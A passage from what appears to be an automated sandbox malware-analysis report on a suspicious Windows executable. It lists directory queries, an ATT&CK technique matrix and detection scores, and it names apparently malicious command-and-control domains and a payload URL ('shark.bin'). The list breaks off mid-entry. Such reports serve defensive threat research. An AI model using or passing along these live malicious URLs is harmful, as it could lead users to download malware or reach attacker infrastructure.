            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\PWZOQIFCANJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
            Source: C:\Users\user\Desktop\#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exeDirectory queried: number of queries: 1001

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000000.00000003.1476540257.00000000035DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe PID: 6168, type: MEMORYSTR
            Source: Yara matchFile source: 00000000.00000003.1509457660.0000000002681000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            21
            Virtualization/Sandbox Evasion
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Native API
            Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Deobfuscate/Decode Files or Information
            LSASS Memory231
            Security Software Discovery
            Remote Desktop Protocol21
            Data from Local System
            2
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
            Obfuscated Files or Information
            Security Account Manager21
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares2
            Clipboard Data
            113
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            DLL Side-Loading
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials33
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe15%VirustotalBrowse
            #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe19%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://bxattlepath.digital/k0%Avira URL Cloudsafe
            jawdedmirror.run/ewqd100%Avira URL Cloudmalware
            https://bxattlepath.digital/uu0%Avira URL Cloudsafe
            nighetwhisper.top/lekd100%Avira URL Cloudmalware
            https://h1.mockupeastcoast.shop:443/shark.bin100%Avira URL Cloudmalware
            https://bxattlepath.digital/s0%Avira URL Cloudsafe
            https://bxattlepath.digital/MP=0%Avira URL Cloudsafe
            https://bxattlepath.digital/AMI0%Avira URL Cloudsafe
            https://bxattlepath.digital/ogda0%Avira URL Cloudsafe
            owlflright.digital/qopy100%Avira URL Cloudmalware
            https://bxattlepath.digital/ogdaf0%Avira URL Cloudsafe
            https://bxattlepath.digital/TM0%Avira URL Cloudsafe
            https://bxattlepath.digital/tem0%Avira URL Cloudsafe
            https://bxattlepath.digital/ogdaB0%Avira URL Cloudsafe
            https://bxattlepath.digital/ogdas0%Avira URL Cloudsafe
            https://bxattlepath.digital/ogdat0%Avira URL Cloudsafe
            bxattlepath.digital/ogda0%Avira URL Cloudsafe
            https://bxattlepath.digital:443/ogdaI0%Avira URL Cloudsafe
            https://h1.mockupeastcoast.shop/l100%Avira URL Cloudmalware
            https://bxattlepath.digital/ogdaIU0%Avira URL Cloudsafe
            https://bxattlepath.digital/ogdaRA0%Avira URL Cloudsafe
            https://bxattlepath.digital/.P0%Avira URL Cloudsafe
            https://h1.mockupeastcoast.shop/shark.binO100%Avira URL Cloudmalware
            https://bxattlepath.digital/ogdaR0%Avira URL Cloudsafe
            https://bxattlepath.digital/rog0%Avira URL Cloudsafe
            https://bxattlepath.digital/ogdaV0%Avira URL Cloudsafe
            https://bxattlepath.digital/b0%Avira URL Cloudsafe
            https://bxattlepath.digital/0%Avira URL Cloudsafe
            https://bxattlepath.digital/:0%Avira URL Cloudsafe
            lonfgshadow.live/xawi100%Avira URL Cloudmalware
            http://ocsp.sectigo.com0B0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            bxattlepath.digital
            172.67.157.7
            truetrue
              unknown
              h1.mockupeastcoast.shop
              89.169.54.153
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                jawdedmirror.run/ewqdtrue
                • Avira URL Cloud: malware
                unknown
                nighetwhisper.top/lekdtrue
                • Avira URL Cloud: malware
                unknown
                changeaie.top/gepsfalse
                  high
                  https://bxattlepath.digital/ogdafalse
                  • Avira URL Cloud: safe
                  unknown
                  owlflright.digital/qopytrue
                  • Avira URL Cloud: malware
                  unknown
                  bxattlepath.digital/ogdatrue
                  • Avira URL Cloud: safe
                  unknown
                  zestmodp.top/zedafalse
                    high
                    liftally.top/xasjfalse
                      high
                      salaccgfa.top/gsoozfalse
                        high
                        lonfgshadow.live/xawitrue
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://h1.mockupeastcoast.shop:443/shark.bin#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1509913195.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://duckduckgo.com/ac/?q=#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0##Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exefalse
                            high
                            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exefalse
                              high
                              http://ocsp.sectigo.com0#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exefalse
                                high
                                https://bxattlepath.digital/uu#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0##Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exefalse
                                  high
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://bxattlepath.digital/k#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0##Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exefalse
                                      high
                                      https://bxattlepath.digital/MP=#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://bxattlepath.digital/s#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.google.com/images/branding/product/ico/googleg_alldp.ico#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://bxattlepath.digital/AMI#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exefalse
                                          high
                                          https://bxattlepath.digital/TM#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://bxattlepath.digital/ogdaf#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1363440490.0000000000688000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://bxattlepath.digital/tem#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://x1.c.lencr.org/0#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://x1.i.lencr.org/0#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1402059952.00000000035F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://bxattlepath.digital:443/ogdaI#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1509913195.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469850554.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1375803058.0000000003568000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://h1.mockupeastcoast.shop/shark.bin#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510036268.00000000006FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://bxattlepath.digital/ogdas#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1469741701.0000000000704000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461122437.0000000000704000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510036268.00000000006FC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461894681.0000000000704000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476673359.0000000000704000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://bxattlepath.digital/ogdat#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://support.mozilla.org/products/firefoxgro.all#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1404628804.000000000366F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0##Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exefalse
                                                      high
                                                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exefalse
                                                        high
                                                        https://bxattlepath.digital/ogdaB#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1398161440.0000000000719000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1398091643.0000000000713000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://h1.mockupeastcoast.shop/l#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510036268.00000000006FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://bxattlepath.digital/ogdaIU#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461894681.00000000006FB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461122437.00000000006F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://sectigo.com/CPS0#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exefalse
                                                          high
                                                          https://bxattlepath.digital/ogdaF#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1401494868.000000000070A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://bxattlepath.digital/ogdaRA#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476673359.0000000000704000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://bxattlepath.digital/.P#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://bxattlepath.digital/rog#Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000002.1510012790.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494732558.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1476995322.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1509334947.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461260878.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1461949271.0000000000694000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 00000000.00000003.1494664228.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Udc12#Ud835#Udc04#Ud835#Udc13#Ud835#Udc14#Ud835#Udc0f_patched.exe, 